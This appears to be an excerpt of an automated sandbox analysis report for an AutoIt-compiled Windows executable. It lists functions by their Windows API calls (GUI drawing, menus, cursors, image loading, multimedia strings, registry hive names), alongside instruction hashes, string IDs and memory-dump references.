                                                    • Instruction ID: 0e4b8f6f9728dede4218d3bee41bf4638b4e3190b49ce566faeb625a25e345b7
                                                    • Opcode Fuzzy Hash: 1118deb2639cc8fc0c9ee7d20cb1a675747b0e2c1f306aa45942b477ae930fab
                                                    • Instruction Fuzzy Hash: 1302EE30109201AFE715CF24C848BABBBE4FF49314F04892EF599963A1C779DC59DB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 0044AB99
                                                    • SetTextColor.GDI32(?,0044A869), ref: 0044AB9D
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044ABB3
                                                    • GetSysColor.USER32(0000000F), ref: 0044ABBE
                                                    • CreateSolidBrush.GDI32(?), ref: 0044ABC3
                                                    • GetSysColor.USER32(00000011), ref: 0044ABDB
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044ABE9
                                                    • SelectObject.GDI32(?,00000000), ref: 0044ABFA
                                                    • SetBkColor.GDI32(?,?), ref: 0044AC03
                                                    • SelectObject.GDI32(?,?), ref: 0044AC10
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0044AC2F
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044AC46
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044AC5B
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044ACA7
                                                    • GetWindowTextW.USER32 ref: 0044ACCE
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0044ACEC
                                                    • DrawFocusRect.USER32 ref: 0044ACF7
                                                    • GetSysColor.USER32(00000011), ref: 0044AD05
                                                    • SetTextColor.GDI32(?,00000000), ref: 0044AD0D
                                                    • DrawTextW.USER32(?,?,000000FF,?,?), ref: 0044AD21
                                                    • SelectObject.GDI32(?,?), ref: 0044AD38
                                                    • DeleteObject.GDI32(?), ref: 0044AD43
                                                    • SelectObject.GDI32(?,?), ref: 0044AD49
                                                    • DeleteObject.GDI32(?), ref: 0044AD4E
                                                    • SetTextColor.GDI32(?,?), ref: 0044AD54
                                                    • SetBkColor.GDI32(?,?), ref: 0044AD5E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: 357c0ab86891208dbc8e64b440f51eab75452ed885c9a0a50f6fe3df521fce48
                                                    • Instruction ID: bd6c48ec3f7a91b8519c20372bad421aca3be3d6fb06e73b1405af7366f773d8
                                                    • Opcode Fuzzy Hash: 357c0ab86891208dbc8e64b440f51eab75452ed885c9a0a50f6fe3df521fce48
                                                    • Instruction Fuzzy Hash: CF618E76900218FFEB119FA4DC48EAEBB79EB09320F214126F911AB2A1C6759D50CF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00444C51
                                                    • GetDesktopWindow.USER32 ref: 00444C66
                                                    • GetWindowRect.USER32 ref: 00444C6D
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00444CCF
                                                    • DestroyWindow.USER32(?), ref: 00444CFB
                                                    • CreateWindowExW.USER32 ref: 00444D24
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00444D42
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00444D68
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00444D7D
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00444D90
                                                    • IsWindowVisible.USER32 ref: 00444DB0
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00444DCB
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00444DDF
                                                    • GetWindowRect.USER32 ref: 00444DF7
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00444E1D
                                                    • GetMonitorInfoW.USER32 ref: 00444E37
                                                    • CopyRect.USER32 ref: 00444E4E
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00444EB9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: e496f963e1da766474b25f24eeab3cbde44f01f1be8ed342719a6e117d8a9f89
                                                    • Instruction ID: 5a0d3c7d829847fa54273c4a7dfd5c1db239fda0c61d9fe324f6f93891c8208c
                                                    • Opcode Fuzzy Hash: e496f963e1da766474b25f24eeab3cbde44f01f1be8ed342719a6e117d8a9f89
                                                    • Instruction Fuzzy Hash: 71B16A71604341AFEB04DF64C849B5BBBE4BF85310F01892EF599AB2A1DB74EC05CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SystemParametersInfoW.USER32 ref: 003C28BC
                                                    • GetSystemMetrics.USER32 ref: 003C28C4
                                                    • SystemParametersInfoW.USER32 ref: 003C28EF
                                                    • GetSystemMetrics.USER32 ref: 003C28F7
                                                    • GetSystemMetrics.USER32 ref: 003C291C
                                                    • SetRect.USER32 ref: 003C2939
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003C2949
                                                    • CreateWindowExW.USER32 ref: 003C297C
                                                    • SetWindowLongW.USER32 ref: 003C2990
                                                    • GetClientRect.USER32 ref: 003C29AE
                                                    • GetStockObject.GDI32(00000011), ref: 003C29CA
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 003C29D5
                                                      • Part of subcall function 003C2344: GetCursorPos.USER32(?,?,004867B0,?,004867B0,004867B0,?,0044C247,00000000,00000001,?,?,?,003FBC4F,?,?), ref: 003C2357
                                                      • Part of subcall function 003C2344: ScreenToClient.USER32 ref: 003C2374
                                                      • Part of subcall function 003C2344: GetAsyncKeyState.USER32(00000001), ref: 003C2399
                                                      • Part of subcall function 003C2344: GetAsyncKeyState.USER32(00000002), ref: 003C23A7
                                                    • SetTimer.USER32(00000000,00000000,00000028,003C1256), ref: 003C29FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 1d6f5ce0d56239fd472a5d6733d70478939c1782393a53b0022213ac236a9ba3
                                                    • Instruction ID: 9cadfeea5e0c32ab1747051df8a04f5af105c2c9093a4f9d662a2b7812735c9f
                                                    • Opcode Fuzzy Hash: 1d6f5ce0d56239fd472a5d6733d70478939c1782393a53b0022213ac236a9ba3
                                                    • Instruction Fuzzy Hash: 8FB18E75A0020AEFDB15DFA8DD45FAE7BB4FB08314F11862AFA15E6290DB74AC40CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00448D34
                                                    • SendMessageW.USER32(?,0000014E,00000000,?), ref: 00448D45
                                                    • CharNextW.USER32(0000014E,?,?,004301B4,00000000,?,?), ref: 00448D74
                                                    • SendMessageW.USER32(?,0000014B,?,?), ref: 00448DB5
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00448DCB
                                                    • SendMessageW.USER32(?,0000014E,00000000,?), ref: 00448DDC
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00448DF9
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00448E45
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00448E5B
                                                    • SendMessageW.USER32(?,00001002,?,?), ref: 00448E8C
                                                    • SendMessageW.USER32(00000000,00001060,?,00000004), ref: 00448EFA
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00448F83
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00448FDB
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00449088
                                                    • InvalidateRect.USER32(00000002,?,00000001), ref: 004490AA
                                                    • GetMenuItemInfoW.USER32(0000014E,00000002,?,00000030), ref: 004490F4
                                                    • SetMenuItemInfoW.USER32 ref: 00449121
                                                    • DrawMenuBar.USER32(00000002), ref: 00449130
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00449158
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                    • String ID:
                                                    • API String ID: 1015379403-0
                                                    • Opcode ID: a85e0b7850a6a685b9a2e7afac8d9ad47fc265982b6083e518e1659175eb76b9
                                                    • Instruction ID: a94c9d416913012e6874c515185e745cb1d339b357145336f487f157f808e79c
                                                    • Opcode Fuzzy Hash: a85e0b7850a6a685b9a2e7afac8d9ad47fc265982b6083e518e1659175eb76b9
                                                    • Instruction Fuzzy Hash: BDE1C474901219AFEF119F50CC88EEF7BB8FF05310F10816AF9159A291DB748A86DF69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?), ref: 004440F6
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004441B6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: f8d8e4e3a55803e0d939fc8e91d81040da52ab5c32dbf93e605ea672ec13c589
                                                    • Instruction ID: 72d24f1e89e87c2b00e8cc08bfcfc6178f2f6612822571b17004b5ffc6e04139
                                                    • Opcode Fuzzy Hash: f8d8e4e3a55803e0d939fc8e91d81040da52ab5c32dbf93e605ea672ec13c589
                                                    • Instruction Fuzzy Hash: 85A1AE302142019BDB14EF20C955F6AB3A5BF84314F11896EB89A9F3D2DB78EC46CB46
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00435309
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00435314
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0043531F
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 0043532A
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00435335
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00435340
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0043534B
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00435356
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00435361
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0043536C
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00435377
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00435382
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043538D
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00435398
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 004353A3
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004353AE
                                                    • GetCursorInfo.USER32(?), ref: 004353BE
                                                    • GetLastError.KERNEL32(00000001,00000000), ref: 004353E9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                    • String ID:
                                                    • API String ID: 3215588206-0
                                                    • Opcode ID: 4ba0ce702d1f49607e24d3b68a7d8dbdd9cb96e96e3e3bd474bc51d4d380d9fb
                                                    • Instruction ID: 7e9724619375f54a1db4bb4e8bb7115b2869acc7c92c3d8d7a4778aec93a8012
                                                    • Opcode Fuzzy Hash: 4ba0ce702d1f49607e24d3b68a7d8dbdd9cb96e96e3e3bd474bc51d4d380d9fb
                                                    • Instruction Fuzzy Hash: 7A418170E04319AADB109FBA8C49D6FFFB8EF55B10F10452FA509E7291DAB8A4018E65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 0041C4D4
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0041C4E6
                                                    • SetWindowTextW.USER32(?,?), ref: 0041C4FD
                                                    • GetDlgItem.USER32 ref: 0041C512
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0041C518
                                                    • GetDlgItem.USER32 ref: 0041C528
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0041C52E
                                                    • SendDlgItemMessageW.USER32 ref: 0041C54F
                                                    • SendDlgItemMessageW.USER32 ref: 0041C569
                                                    • GetWindowRect.USER32 ref: 0041C572
                                                    • SetWindowTextW.USER32(?,?), ref: 0041C5DD
                                                    • GetDesktopWindow.USER32 ref: 0041C5E3
                                                    • GetWindowRect.USER32 ref: 0041C5EA
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0041C636
                                                    • GetClientRect.USER32 ref: 0041C643
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0041C668
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0041C693
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • DragQueryPoint.SHELL32(?,?), ref: 0044C917
                                                      • Part of subcall function 0044ADF1: ClientToScreen.USER32(?,?), ref: 0044AE1A
                                                      • Part of subcall function 0044ADF1: GetWindowRect.USER32 ref: 0044AE90
                                                      • Part of subcall function 0044ADF1: PtInRect.USER32(?,?,?), ref: 0044AEA0
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0044C980
                                                    • DragQueryFileW.SHELL32(?,000000FF,?,?), ref: 0044C98B
                                                    • DragQueryFileW.SHELL32(?,?,?,00000104), ref: 0044C9AE
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044C9F5
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0044CA0E
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0044CA25
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0044CA47
                                                    • DragFinish.SHELL32(?), ref: 0044CA4E
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0044CB41
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prH
                                                    • API String ID: 221274066-2884536810
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 004446AB
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004446F6
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DestroyWindow.USER32(00000000,?), ref: 0044A542
                                                    • CreateWindowExW.USER32 ref: 0044A5BC
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0044A5DE
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044A5F1
                                                    • DestroyWindow.USER32(00000000), ref: 0044A613
                                                    • CreateWindowExW.USER32 ref: 0044A64A
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044A663
                                                    • GetDesktopWindow.USER32 ref: 0044A67C
                                                    • GetWindowRect.USER32 ref: 0044A683
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0044A69B
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0044A6B3
                                                      • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1652260434-3619404913
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadImageW.USER32 ref: 0044BB6E
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00449431,?,?,?,?,?,?), ref: 0044BBCA
                                                    • LoadImageW.USER32 ref: 0044BC03
                                                    • LoadImageW.USER32 ref: 0044BC46
                                                    • LoadImageW.USER32 ref: 0044BC7D
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,00449431,?,?,?,?,?,?), ref: 0044BC89
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0044BC99
                                                    • DestroyIcon.USER32(?,?,?,?,?,00449431,?,?,?,?,?,?), ref: 0044BCA8
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0044BCC5
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0044BCD1
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 1446636887-1154884017
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 0042A636
                                                    • GetDriveTypeW.KERNEL32 ref: 0042A683
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A6CB
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A702
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A730
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1600147383-4113822522
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00449476,?,?), ref: 0044BD10
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD27
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD32
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD3F
                                                    • GlobalLock.KERNEL32 ref: 0044BD48
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD57
                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD60
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD67
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00449476,?,?,?,?), ref: 0044BD78
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00452CAC,?), ref: 0044BD91
                                                    • GlobalFree.KERNEL32 ref: 0044BDA1
                                                    • GetObjectW.GDI32(?,00000018,?,?,?,?,?,00449476,?,?,?,?), ref: 0044BDC5
                                                    • CopyImage.USER32 ref: 0044BDF0
                                                    • DeleteObject.GDI32(00000000), ref: 0044BE18
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0044BE2E
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0041874A: GetUserObjectSecurity.USER32(?,00000004,?,?,?), ref: 00418766
                                                      • Part of subcall function 0041874A: GetLastError.KERNEL32(?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418770
                                                      • Part of subcall function 0041874A: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,00418427,?,?,?), ref: 0041877F
                                                      • Part of subcall function 0041874A: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418786
                                                      • Part of subcall function 0041874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041879D
                                                      • Part of subcall function 004187E7: GetProcessHeap.KERNEL32(00000008,?,?,?,?,0041843D,?), ref: 004187F3
                                                      • Part of subcall function 004187E7: HeapAlloc.KERNEL32(00000000,?,?,?,0041843D,?), ref: 004187FA
                                                      • Part of subcall function 004187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,?,?,?,?,0041843D,?), ref: 0041880B
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00418458
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0041848C
                                                    • GetLengthSid.ADVAPI32(?), ref: 0041849D
                                                    • GetAce.ADVAPI32(?,?,?), ref: 004184DA
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?,?,?), ref: 004184F6
                                                    • GetLengthSid.ADVAPI32(?), ref: 00418513
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00418522
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00418529
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0041854A
                                                    • CopySid.ADVAPI32(00000000), ref: 00418551
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00418582
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?), ref: 004185A8
                                                    • SetUserObjectSecurity.USER32 ref: 004185BC
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                                    • String ID:
                                                    • API String ID: 1795222879-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00438BEC
                                                    • CoInitialize.OLE32(00000000), ref: 00438C19
                                                    • CoUninitialize.OLE32 ref: 00438C23
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00438D23
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00438E50
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00452C0C), ref: 00438E84
                                                    • CoGetObject.OLE32(?,00000000,00452C0C,?), ref: 00438EA7
                                                    • SetErrorMode.KERNEL32(00000000), ref: 00438EBA
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00438F3A
                                                    • VariantClear.OLEAUT32(?), ref: 00438F4A
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID: ,,E
                                                    • API String ID: 2395222682-4052858919
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0044C4EC
                                                    • GetFocus.USER32(?,?,?,?), ref: 0044C4FC
                                                    • GetDlgCtrlID.USER32(00000000), ref: 0044C507
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0044C65D
                                                    • GetMenuItemCount.USER32 ref: 0044C67D
                                                    • GetMenuItemID.USER32(?,00000000), ref: 0044C690
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0044C6C4
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0044C70C
                                                    • CheckMenuRadioItem.USER32 ref: 0044C744
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0044C779
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                    • String ID: 0
                                                    • API String ID: 1026556194-4108050209
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00440038,?,?), ref: 004410BC
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: 6f4ac6b568016aab02fb5505038652f8664a799c6973adb60268f3cf6041e326
                                                    • Instruction ID: e6ffd9e6d4b039e74129b0452aaea777ae9dcba8d4f56492cd5ed7c3180765e2
                                                    • Opcode Fuzzy Hash: 6f4ac6b568016aab02fb5505038652f8664a799c6973adb60268f3cf6041e326
                                                    • Instruction Fuzzy Hash: 9941C23014028E8BEF15EF90DC90AEB3724FF15350F408556FD959B2A1DB78AD8ACB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004255D2
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004255E8
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004255F9
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0042560B
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0042561C
                                                    Strings
                                                    Memory Dump Source
